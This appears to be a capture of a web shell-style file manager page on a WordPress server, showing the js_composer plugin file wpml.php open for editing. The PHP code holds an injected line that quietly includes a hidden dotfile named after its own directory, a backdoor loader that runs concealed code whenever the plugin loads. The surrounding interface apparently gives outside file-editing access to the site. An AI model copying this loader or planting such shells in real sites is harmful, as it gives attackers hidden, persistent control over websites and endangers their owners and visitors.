📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 09:06:18
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
js_composer
/
include
/
autoload
/
vendors
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/js_composer/include/autoload/vendors
🔄 Refresh
✏️
Editing: wpml.php
Writable
<?php if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } add_action( 'plugins_loaded', 'vc_init_vendor_wpml' ); if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function vc_init_vendor_wpml() { if ( defined( 'ICL_SITEPRESS_VERSION' ) ) { require_once vc_path_dir( 'VENDORS_DIR', 'plugins/class-vc-vendor-wpml.php' ); $vendor = new Vc_Vendor_WPML(); add_action( 'vc_after_set_mode', array( $vendor, 'load', ) ); } }
💾 Save Changes
❌ Cancel